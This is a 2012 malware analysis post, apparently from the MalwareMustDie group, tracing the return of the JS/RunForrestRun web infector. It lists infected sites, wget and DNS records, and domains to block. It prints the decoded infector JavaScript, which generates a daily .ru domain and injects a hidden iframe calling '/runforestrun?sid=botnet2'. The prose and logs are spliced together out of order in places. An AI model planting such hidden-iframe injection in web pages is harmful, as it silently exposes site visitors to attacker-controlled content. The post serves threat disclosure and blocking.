JS/RunForrestRun Infector ComeBack! Full Disclosure of Decoding URL, DGA Domain List, Registrar & DNS info.
12 Dec 2012
Today I will fully disclose the new PseudoRandom Domain / DGA of Infector
JS/RunForrestRun we caught just soppted "come-back" in action.
It was started by hundreds infection found via spam emails linked url to://case -1-We reported the osmanoguz.net right away and received cleanup response right away (thumbs up!) But the infections using fotoajanda.com is still ACTIVE, UP & ALIVE, as - per shown below in download PoC:
h00p://www.osmanoguz.net/?p=422
h00p://www.osmanoguz.net/afferim-nan-sana-google.html
h00p://www.osmanoguz.net/artik-buralardayim-be-google.html
h00p://www.osmanoguz.net/ay-lav-yu-full-izle.html
h00p://www.osmanoguz.net/?p=1677
h00p://www.osmanoguz.net/2009un-en-kotu-oyunlari.html
h00p://www.osmanoguz.net/?p=2530
h00p://www.osmanoguz.net/?p=1821
h00p://www.osmanoguz.net/?p=1829
h00p://www.osmanoguz.net/?p=2477
:
//case -2-
h00p://www.fotoajanda.com/?amp;album=140&id=3375&kategori=8&p=album
h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=album
h00p://fotoajanda.com/?album=25
h00p://fotoajanda.com/?album=68
h00p://fotoajanda.com/?album=89
h00p://www.fotoajanda.com/?p=album&kategori=8&album=66&id=1777
h00p://www.fotoajanda.com/?p=album&kategori=8&album=140&id=3375
h00p://fotoajanda.com/?amp;album=3&id=22/&kategori=5&p=album
:--13:58:37-- h00p://www.fotoajanda.com/?amp;album=66&id=1777&kategori=8&p=albumThe web server info itself can be viewed by the below header request:
Resolving www.fotoajanda.com... 89.107.228.218
Connecting to www.fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25,838 (25K) [text/html]
13:58:39 (26.68 KB/s) - `./sample2.txt' saved [25838/25838]
--14:00:17-- h00p://fotoajanda.com/?album=25
Resolving fotoajanda.com... 89.107.228.218
Connecting to fotoajanda.com|89.107.228.218|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75,063 (73K) [text/html]
14:00:20 (45.54 KB/s) - `./sample3.txt' saved [75063/75063]GET /?amp;album=140&id=3375&kategori=8&p=album HTTP/1.0And I guess it doesn't look clean IP/site for me. At this point I looked the IP used in this infector domain - which is 89.107.228.218 & surprised by many malicious domains queried - via this IP as per below:
User-Agent: Get well soon Razor! I'm banging this infector for your health!
Accept: */*
Host: www.fotoajanda.com
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 12 Dec 2012 04:43:39 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.14
X-Powered-By: PleskLin
Content-Length: 25838
---response end---
200 OK
Length: 25,838 (25K) [text/html]
13:43:47 (26.19 KB/s) - `./sample' saved [25838/25838]
FINISHED --13:43:47--
Downloaded: 25,838 bytes in 1 filesfotoajanda.com A 89.107.228.218Some of the malicious domains using www subdomain as CNAME:
armonipiyanodersi.com A 89.107.228.218
www.radyopop.com A 89.107.228.218
dorukuzgur.com A 89.107.228.218
datants.com A 89.107.228.218
thierrydiniz.com A 89.107.228.218
ozge.net A 89.107.228.218
www.ozge.net A 89.107.228.218
demle.net A 89.107.228.218
yayindayiz.biz A 89.107.228.218www.fotoajanda.com CNAME fotoajanda.comSame IP also being used to serve as DNS of malicious domains below:
www.armonipiyanodersi.com CNAME armonipiyanodersi.com
www.dorukuzgur.com CNAME dorukuzgur.com
www.datants.com CNAME datants.com
www.yayindayiz.biz CNAME yayindayiz.bizns1.trserver.com A 89.107.228.218In the downloaded data you'll see the injected malcode in - every end of file as per snipped below:
ns.yayindayiz.biz A 89.107.228.218
ns.dorukuzgur.com A 89.107.228.218<script>/*km0ae9gr6m*/window.eval(String.fromCharCode(116,114..Which suggesting a format of obfuscated JS/RunForrestRun infector. This obfs'ed code can be easily decoded to find the - PseudoRandom Domain / DGA used by this infection as per below "hexed" code:
41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,117..
34,116,34,43,34,101,34,43,34,69,34,43,34,108,34,43,34,101,34,..
112,34,41,59,113,46,97,112,112,101,110,100,67,104,105,108,100..
:
,53,52,93,59,118,61,34,101,118,97,34,59,125,105,1
14,61,83,116,114,105,110,103,59,122,61,40,40,101,
61,49,41,123,106,61,105,59,105,102,40,101,41,115,
7,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,
101,40,115,41,59,125,10));/*qhk6sa6g1c*/</script>function nextRandomNumber(){The code above will resulted in .RU domains difined by the date to formulate - the url infector as per below structure:
var hi = this.seed / this.Q;
var lo = this.seed % this.Q;
var test = this.A * lo - this.R * hi;
if(test > 0){
this.seed = test;
} else {
this.seed = test + this.M;
} return (this.seed * this.oneOverM); }
function RandomNumberGenerator(unix){
var d = new Date(unix*1000);
var s = d.getHours() > 12 ? 1 : 0;
this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
this.A = 48271;
this.M = 2147483647;
this.Q = this.M / this.A;
this.R = this.M % this.A;
this.oneOverM = 1.0 / this.M;
this.next = nextRandomNumber;
return this; }
function createRandomNumber(r, Min, Max){
return Math.round((Max-Min) * r.next() + Min); }
function generatePseudoRandomString(unix, length, zone){
var rand = new RandomNumberGenerator(unix);
var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
var str = '';
for(var i = 0; i < length; i ++ ){
str += letters[createRandomNumber(rand, 0, letters.length - 1)];
} return str + '.' + zone;}
setTimeout(function(){
try{
if(typeof iframeWasCreated == "undefined"){
iframeWasCreated = true;
var unix = Math.round(+new Date()/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
ifrm = document.createElement("IFRAME");
ifrm.setAttribute("src", "h00p://"+domainName+"/runforestrun?sid=botnet2");
ifrm.style.width = "0px";
ifrm.style.height = "0px";
ifrm.style.visibility = "hidden";
document.body.appendChild(ifrm);
} }catch(e){} }, 500)http://****.ru/runforestrun?sid=botnet2To crack or burps the domains used by this DGA is really easy :-) Just change the setTimeout function()try's code into the below, (by switching the year of 2012 & 2013)//nextday.setFullYear(2012);[IMPORTANT!]It will generated the domains aimed for this infection as per listed in the pastebin here --->>[PASTEBIN]
nextday.setFullYear(2013);
for (var yyy=0;yyy<13;yyy++)
{ nextday.setMonth(yyy);
for (var xxx= 1;xxx<33;xxx++)
{
var unix = Math.round(nextday.setDate(xxx)/1000);
var domainName = generatePseudoRandomString(unix, 16, 'ru');
document.write(xxx+" | "+domainName+ " | "+nextday+"\n"); }}Are these really to-be-in-use malware domains?
To check this theory is simple. If we can find that some of those domains are currently alive/registered, then we can confirm this theory. For checking almost 400 domains will not - be easy, that's why I uploaded the script/tools for this purpose in our - Google Project Download Page here --->>[MMD Google Project] The check result burped some domains currently UP & ALIVE, PoC↓:So are the urls download page for this infection up? If the url ia also up, it will not returning 404, then PoC is proved↓
bhigmqckbqhleqlo.ru,91.233.244.102, // Wed Nov 06 2013 15:50:08 GMT+0900
nsjosicxuhpidhlp.ru,91.233.244.102, // Thu Nov 07 2013 15:50:08 GMT+0900
:--16:29:50-- h00p://bhigmqckbqhleqlo.ru/runforestrun?sid=botnet2↑Yep! both HOST & URL are UP and ALIVE! The current case's DGA domain infector list theory is proven!
Resolving bhigmqckbqhleqlo.ru... 91.233.244.102
Connecting to bhigmqckbqhleqlo.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OK
--16:31:03-- h00p://nsjosicxuhpidhlp.ru/runforestrun?sid=botnet2
Resolving nsjosicxuhpidhlp.ru... 91.233.244.102
Connecting to nsjosicxuhpidhlp.ru|91.233.244.102|:80... connected.
HTTP request sent, awaiting response... 200 OKWhat internet service /ISP/DNS are these badactors using?
So let's look it up...bhigmqckbqhleqlo.ru. 3600 IN SOA dns1.webdrive.ru. admin.webdrive.ru. 1354094642 10800 3600 604800 3600So they are using WEBDRIVE.RU Registration for Domains, interesting! Following this case, we will see OTHER malware domains in the same base IP:
nsjosicxuhpidhlp.ru. 3600 IN SOA dns1.webdrive.ru. admin.webdrive.ru. 1354095124 10800 3600 604800 3600
bhigmqckbqhleqlo.ru. 3600 IN A 91.233.244.102
bhigmqckbqhleqlo.ru. 3600 IN NS dns1.webdrive.ru.
bhigmqckbqhleqlo.ru. 3600 IN NS dns2.webdrive.ru.
nsjosicxuhpidhlp.ru. 3382 IN A 91.233.244.102
nsjosicxuhpidhlp.ru. 3381 IN NS dns2.webdrive.ru.
dns1.webdrive.ru. 1991 IN A 176.74.216.129
dns2.webdrive.ru. 1990 IN A 159.253.133.210Cool, we have more evil domains. It is indeed nteresting! Furthermore, I doubt below DNS servers are used for ONLY good domains.. I bet there are EVIL DNS domains registered insides..
donotwantyou787.ru A 91.233.244.102
nsjosicxuhpidhlp.ru A 91.233.244.102ns1.unitedplatform.com A 176.74.216.129
ns1.daodomains.com A 176.74.216.129
ns1.regway.com A 176.74.216.129
n1.reg3.ru A 176.74.216.129
ns1.nic-online.ru A 176.74.216.129
dns1.webdrive.ru A 176.74.216.129
ns1.getdomen.ru A 176.74.216.129
ns1.yoursdomain.ru A 176.74.216.129
dc1.nserver.ru A 176.74.216.129
ns1.donax.ru A 176.74.216.129
ns2.unitedplatform.com A 159.253.133.210
ns2.daodomains.com A 159.253.133.210
ns2.regway.com A 159.253.133.210
n2.reg3.ru A 159.253.133.210
ns2.nic-online.ru A 159.253.133.210
dns2.webdrive.ru A 159.253.133.210
ns2.getdomen.ru A 159.253.133.210
dc2.nserver.ru A 159.253.133.210
ns2.donax.ru A 159.253.133.210How bad the "Come-Back" infection of RunforrestRun?
Well, at least you'll find the below urls are infected by the same obfuscated infector Javascript code:// New Infection of PseudoRandom(DGA) RunForrestRun
// December 9th - 11th, 2012
h00p://adamlambrechtfamily.info/user.php?PHPSESSID=e9of24684l4e69b2vi05f1r3k7&xoops_redirect=%2Fmodules%2Fmydownloads%2Fsubmit.php
h00p://adamlambrechtfamily.info/modules/content/index.php?id=0
h00p://adamlambrechtfamily.info/user.php?PHPSESSID=cfe8ukkcnp5tam437p81bl7s43&xoops_redirect=%2Fmodules%2Fmydownloads%2Fsubmit.php
h00p://www.janessafari.com/index.php/page/3/
h00p://www.janessafari.com/index.php/2009/11/
h00p://rouen-saint-valentin.com/
h00p://rouen-saint-valentin.com/index.php?menu_mnemo=menu_news
h00p://gopeyup.com/js/kategoriler.js
h00p://www.directoames.com/2009/06
h00p://www.nowax.co.uk/wordpress_nowax/wp-content/themes/3k2/js/slider.js.php
h00p://www.armonipiyanodersi.com/page/2
h00p://www.unic.ae/
h00p://www.armonipiyanodersi.com/2010/08/11
h00p://giaohoi.net/
h00p://alacatiayakkabi.com/iletisim.html
h00p://www.isaanmassage.com/thai-language-version/trackback
h00p://www.calendarigadget.it/wp-content/plugins/shutter-reloaded/shutter-reloaded.js
h00p://www.shivalikenterprise.com/js/jquery.min.js
h00p://www.pssrijan.com/js/marquee.js
h00p://www.economics4development.com/economic_development_theories.htm
h00p://www.directoames.com/2010/12
h00p://www.jasonslog.com/
h00p://allmovingboxes.com/index.php?cpath=23
:
:
and many more before 9th of Dec, 2012.
*) The infection reports were sent..The moral of this post is...
Friends, you will do a very good deed to our internet service if you just BLOCK every Domains, IP Addresses & DNS info reported in this post. We took effort to proof this theory, through some rechecks before exposal.
#MalwareMustDie